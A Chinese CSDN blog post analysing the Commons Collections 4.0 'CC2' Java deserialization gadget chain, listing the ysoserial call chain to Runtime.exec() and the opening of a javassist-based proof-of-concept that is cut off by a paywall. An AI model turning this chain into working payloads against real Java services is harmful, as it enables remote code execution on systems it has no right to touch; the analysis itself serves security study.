Java安全 CC链2分析

已于 2024-04-11 20:13:58 修改
阅读量1.1k 收藏 17
点赞数 23
分类专栏: Java安全 web安全 开发 文章标签: java web安全 代码复审
于 2024-03-16 00:09:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Elite__zhb/article/details/136752888
版权

Java安全 CC链2分析

cc链2介绍

CC2链适用于Apache common collection 4.0版本,由于该版本对AnnotationInvocationHandler类readObject方法进行了修复,导致cc链1无法使用,故产生了cc链2,cc链2与cc链3相似,都使用了字节码的加载,并且后续的触发链也基本相同

前置知识

环境配置

有关环境配置请看

Java安全 CC链1分析

不同的是由于我们需要使用的版本为cc4,故需要设置pom.xml文件依赖内容如下

    <dependencies>
        <dependency>
            <groupId>org.javassist</groupId>
            <artifactId>javassist</artifactId>
            <version>3.19.0-GA</version>
        </dependency>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-collections4</artifactId>
            <version>4.0</version>
        </dependency>
    </dependencies>

类加载机制

可以看这篇文章

Java安全 CC链3分析

触发流程

ysoserial中给出的链

ObjectInputStream.readObject()
			PriorityQueue.readObject()
				PriorityQueue.heapify();
					PriorityQueue.siftDown();
   						siftUpUsingComparator();
							TransformingComparator.compare()
								InvokerTransformer.transform()
									Method.invoke()
										Runtime.exec()

cc链2POC

package org.example;

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;


public class cc2 {
   
    public static void main(String[] args) throws Exception {
   
        String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
        String TemplatesImpl="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

        ClassPool classPool=ClassPool.getDefault();//返回默认的类池
        classPool.appendClassPath(AbstractTranslet);//添加AbstractTranslet的搜索路径
        CtClass payload=classPool.makeClass("cc2");//创建一个新的public类
        payload.setSuperclass(classPool.get(AbstractTranslet));  //设置父类为AbstractTranslet
        payload.makeClassInitializer().
最低0.47元/天 解锁文章
Elitewa
关注
  • 23
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
tomcat以及Java开发软件
03-05
`Cnzz.cc说明.txt`可能包含关于某个统计分析服务的说明,通常用于网站流量监测。`免费领取1Q币.url`和`免费正版杀毒软件.url`可能是指向特定网页的链接,提供相关的促销活动或安全软件资源。最后,`源码下载.url`...
Java安全研究——反序列化漏洞之CC2链
weixin_43889136的博客
05-10 1507
0x01
网络安全面试题.docx
01-17
15. **Java反序列化CC链**:Control Flow Hijacking(控制流劫持)通过反序列化漏洞实现,控制程序执行流程以达到攻击目的。 16. **SQLMap源码阅读**:SQLMap是一款自动化的SQL注入工具,了解其源码有助于理解注入...
SWT开发的浏览器(Java)--源代码
05-14
通过分析这个源代码,我们可以深入理解SWT如何被用来构建具有实际应用价值的程序。 首先,我们要了解SWT的优势。与Java标准库中的AWT和Swing不同,SWT直接调用操作系统的API,因此在性能和外观上更接近原生应用。这...
PartyPlaylist:根据您和您的好友最喜欢的歌手的播放列表
05-02
2. **集合框架**:Java集合框架提供了ArrayList、HashSet等数据结构,用于存储和管理用户和歌曲的信息。例如,可以使用HashSet存储用户喜欢的歌手,快速查找和去重。 3. **IO流**:Java的IO流处理能力强大,可用于...
url-shortening-service
04-02
总的来说,构建一个URL缩短服务涉及到URL处理、数据库设计、API开发、安全性考量以及性能优化等多个方面,这要求开发者具备扎实的Java基础和Web开发经验。通过这个项目,不仅可以提升编程技能,还能更好地理解Web...
配置Java开发环境
最新发布
Broken_x的博客
07-10 1065
Java开发环境配置
关于static定义初始化块和静态变量以及初始化块的执行顺序问题
你我约定有三的博客
07-08 269
第二步:在类加载的时候,按照从上到下执行static修饰的代码,此时执行static Test2 test1 = new Test2(),也就是创建出一个名为test1的对象。第六步:此时除了main方法,所有由static修饰的代码全部执行完毕(static修饰的代码只执行一次),类初始化完成,开始执行main方法,main方法中只有一条语句(中的代码,此时输出aa以及a的值(由于第一步没赋初值,并且给了默认值为0 所以输出0)//首先输出a的值为10 然后输出bb,最后将a的值定义为11。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 1742
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
java Object 转 Integer
servepeople的博客
07-09 1172
Java 中,可以通过多种方法将一个Object转换为Integer。
java占位符替换五种方式
weixin_61478518的博客
07-08 343
在业务开发中,经常需要输出文本串。其中,部分场景下大部分文本内容是一样的,只有少部分点是不一样。简单做法是直接拼接字段,但是这会有个问题。后面如果想要修改内容,那么每个地方都要修改,这不符合设计模式中的开闭原则,面向应该对扩展开放,对修改关闭。如何解决这个问题?先来看现实生活中的例子,个人信息填写。一般会要填写表格,已经定义好了姓名,性别,年龄等字段,只要填写对应的个人信息就好了。在程序开发中,我们会预先定义好一个字符串模板,需要改动的点使用占位符。
AI技术的转变:从辨别式到生成式
学IT,找陈寒
07-09 2917
李彦宏在2024世界人工智能大会上的发言,提醒我们在AI技术发展的道路上,不要盲目追求技术本身或表面的用户数据,而应更多地关注技术的实际应用和产业价值。在大模型技术与个性化应用之间找到平衡,将是未来发展的关键。作为AI从业者和技术爱好者,我们应以务实的态度,探索AI技术在各个领域的实际应用,为产业发展和社会进步贡献力量。通过李彦宏的发言,我深刻认识到AI技术发展的方向和挑战,也更加坚定了自己在这一领域继续探索和创新的信心。未来,愿我们共同努力,推动AI技术更好地服务于社会和产业,为人类创造更美好的未来。
java中 使用数组实现需求小案例(二)
qq_44304677的博客
07-09 802
java小案例,数组需求实现,使用Random函数实现用户输入随机数生成一个打乱的数组
JavaSE 面向对象程序设计进阶 IO流 字节流详解 抛出异常
牛马程序员的博客
07-10 605
存储和读取数据的解决方案内存中数据不能永久化存储 程序停止运行 数据消失File只能对文件本身进行操作 不能读写文件里存储的数据读写数据必须要有IO流可以把程序中的数据保存到文件当中还可以把本地文件中的数据读取到数据当中。
图片压缩代码和实际操作页面
英雄汉孑的博客
07-05 1048
轻盈视界,高清依旧 —— 智能图片压缩,大容量,小体积,精彩不打折
基于SpringBoot的招聘信息管理系统的详细设计和实现(源码+lw+部署文档+讲解等,欢迎咨询我!!)
程序员阿龙的博客
07-06 1368
本次分享的是一个基于java开发的招聘信息管理系统,也说明了自己的开发实力,欢迎各位小伙伴来咨询相关业务,也可以参考一下这个文章!!
返回值处理器器【Spring源码学习】
weixin_44794897的博客
07-05 329
定义返回值类型处理器的组合;测试使用的controller测试方法。
学习mybatis
weixin_45621552的博客
07-08 662
【代码】学习mybatis。
基于springboot的工作绩效管理系统的设计与实现+文档
欧阳小白闯天涯
07-05 733
本毕业设计旨在设计与实现基于Spring Boot的工作绩效管理系统,以满足现代企业对绩效管理的需求。随着企业规模的不断扩大和竞争日益激烈,高效的绩效管理成为提升企业竞争力的重要手段。本系统将利用Spring Boot框架搭建,结合MySQL数据库和MyBatis持久层框架,以及Thymeleaf模板引擎,为企业提供全面的绩效管理解决方案。系统功能包括员工和管理员两个角色。员工可通过系统进行绩效管理、工资管理、统计分析、请假管理以及公告管理等操作,从而提升工作效率和满足个人需求。
Java 安全编码.pdf
03-18
"本资源主要探讨了Java安全编码的相关问题,旨在帮助开发者避免常见的安全漏洞,提升Web应用的安全性。课程目标包括了解多种攻击方法,如SQL注入、跨站脚本攻击(XSS)、HTTP响应拆分等,并关注访问控制、随机性不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Elitewa

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值